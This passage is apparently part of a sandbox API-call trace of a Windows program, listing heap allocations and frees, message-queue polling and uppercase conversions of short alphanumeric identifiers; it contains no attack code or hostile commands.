returned 1 [0260.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0260.931] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0260.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9a68 [0260.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c98 [0260.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6aa8 [0260.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0260.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1438 [0260.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e28 | out: hHeap=0x25c0000) returned 1 [0260.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c88 [0260.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9e28 [0260.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa1b8 [0260.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0260.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0260.932] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0260.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0260.932] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0260.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0260.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0260.932] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24ac9f0 [0260.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16b8 [0260.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6cb0 [0260.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0260.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0260.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9648 | out: hHeap=0x25c0000) returned 1 [0260.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6be8 [0260.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9648 [0260.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9ed0 [0260.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0260.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0260.933] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0260.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0260.933] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0260.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0260.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0260.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa9b0 [0260.933] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a48 [0260.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3c68 [0260.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2415a18 [0260.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95b8 | out: hHeap=0x25c0000) returned 1 [0260.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b69e0 [0260.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95b8 [0260.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a9de0 [0260.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0260.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0260.934] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0260.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2da8 [0260.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0260.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b3ba0 [0260.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24a95d0 [0260.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x24aa920 [0260.934] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x2412248 [0260.934] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24ab310 | out: hHeap=0x25c0000) returned 1 [0260.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0260.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0260.935] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0260.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa878 | out: hHeap=0x25c0000) returned 1 [0260.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0260.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0260.935] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.935] CharUpperBuffW (in: lpsz="A5400102815", cchLength=0xb | out: lpsz="A5400102815") returned 0xb [0260.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0260.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.935] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.935] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.936] CharUpperBuffW (in: lpsz="SSA5400102815", cchLength=0xd | out: lpsz="SSA5400102815") returned 0xd [0260.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0260.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0260.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0260.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0260.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.936] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0260.936] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.936] CharUpperBuffW (in: lpsz="A060070245B", cchLength=0xb | out: lpsz="A060070245B") returned 0xb [0260.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0260.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.936] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0260.936] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.936] CharUpperBuffW (in: lpsz="SSA060070245B", cchLength=0xd | out: lpsz="SSA060070245B") returned 0xd [0260.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0260.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0260.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0260.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0260.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.937] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0260.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0260.937] PeekMessageW (in: lpMsg=0x8bed60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bed60) returned 0 [0260.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0260.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0260.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0260.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0260.937] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0260.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0260.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0260.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0260.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0260.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.938] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0260.938] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.938] CharUpperBuffW (in: lpsz="A610080612A", cchLength=0xb | out: lpsz="A610080612A") returned 0xb [0260.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0260.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.938] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.938] CharUpperBuffW (in: lpsz="SSA610080612A", cchLength=0xd | out: lpsz="SSA610080612A") returned 0xd [0260.938] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0260.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0260.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0260.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0260.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.939] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8e0 | out: hHeap=0x25c0000) returned 1 [0260.939] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0260.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0260.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0260.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0260.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0260.939] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0260.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.940] PeekMessageW (in: lpMsg=0x8bef00, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef00) returned 0 [0260.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0260.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1d0 | out: hHeap=0x25c0000) returned 1 [0260.940] PeekMessageW (in: lpMsg=0x8bf160, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf160) returned 0 [0260.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0260.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0260.940] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.940] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0260.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2da8 | out: hHeap=0x25c0000) returned 1 [0260.940] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0260.940] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0260.940] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0260.940] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0260.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.941] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0260.941] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0260.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0260.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0260.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0260.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0260.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0260.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.941] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d920 | out: hHeap=0x25c0000) returned 1 [0260.941] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0260.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20b0 | out: hHeap=0x25c0000) returned 1 [0260.941] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9e58 | out: hHeap=0x25c0000) returned 1 [0260.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa8a8 | out: hHeap=0x25c0000) returned 1 [0260.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0b0 | out: hHeap=0x25c0000) returned 1 [0260.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a20a0 | out: hHeap=0x25c0000) returned 1 [0260.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0260.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa0e0 | out: hHeap=0x25c0000) returned 1 [0260.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a95d0 | out: hHeap=0x25c0000) returned 1 [0260.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa140 | out: hHeap=0x25c0000) returned 1 [0260.942] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa050 | out: hHeap=0x25c0000) returned 1 [0260.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa830 | out: hHeap=0x25c0000) returned 1 [0260.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b3ba0 | out: hHeap=0x25c0000) returned 1 [0260.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aaec0 | out: hHeap=0x25c0000) returned 1 [0260.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9cc0 | out: hHeap=0x25c0000) returned 1 [0260.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24a9df8 | out: hHeap=0x25c0000) returned 1 [0260.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa860 | out: hHeap=0x25c0000) returned 1 [0260.943] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aa1e8 | out: hHeap=0x25c0000) returned 1 [0260.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24aca50 | out: hHeap=0x25c0000) returned 1 [0260.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.944] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2080 | out: hHeap=0x25c0000) returned 1 [0260.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a2090 | out: hHeap=0x25c0000) returned 1 [0260.945] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34b2250 